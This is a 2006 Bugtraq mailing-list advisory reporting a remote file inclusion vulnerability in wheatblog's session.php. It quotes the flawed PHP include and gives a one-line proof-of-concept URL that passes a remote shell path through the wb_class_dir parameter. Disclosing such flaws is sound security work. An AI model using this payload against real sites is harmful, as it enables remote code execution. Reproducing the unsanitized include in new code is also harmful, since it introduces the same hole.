wheatblog ُSession.php Remote File Inclusion

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: wheatblog ُSession.php Remote File Inclusion
From: Outlaw@xxxxxxxxxxxxxxxxx
Date: 11 Aug 2006 08:43:48 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

###########################################################################################
#Aria-Security.net Advisory                                                     
          #
#Discovered  by: O.U.T.L.A.W                                                    
    #
#< www.Aria-security.net >                                                      
          #
#Gr33t to: A.u.r.a  & l2odon & DrtRp & Sh3ll#
###########################################################################################


<?php
include_once("$wb_class_dir/classDatabase.php");


function Start_Session()
{
        global $session_dir;

        if ( $session_dir != '' )
                session_save_path($session_dir);

        if ( ! isset($_SESSION) )
        {
                session_start();
                // Supposedly a fix for IE6
                header('Cache-control: private');
                My_Cache();

                if ( ! isset($_SESSION['db']) || gettype($_SESSION['db']->db) 
!= 'resource')
                        touchDatabaseSession();

        }
}


---------------------------------------

Proof of Concept:
www.site.com/includes/session.php?wb_class_dir=SHELL

Contact : Outlaw@xxxxxxxxxxxxxxxxx

Prev by Date: Re: [ GLSA 200608-12 ] x11vnc: Authentication bypass in included LibVNCServer code
Next by Date: UPDATE: [ GLSA 200511-12 ] Scorched 3D: Multiple vulnerabilities
Previous by thread: WEBInsta Mailing list manager (cabsolute_path) 1.3e RFI
Next by thread: UPDATE: [ GLSA 200511-12 ] Scorched 3D: Multiple vulnerabilities
Index(es):
- Date
- Thread

wheatblog &#1615;Session.php Remote File Inclusion

wheatblog ُSession.php Remote File Inclusion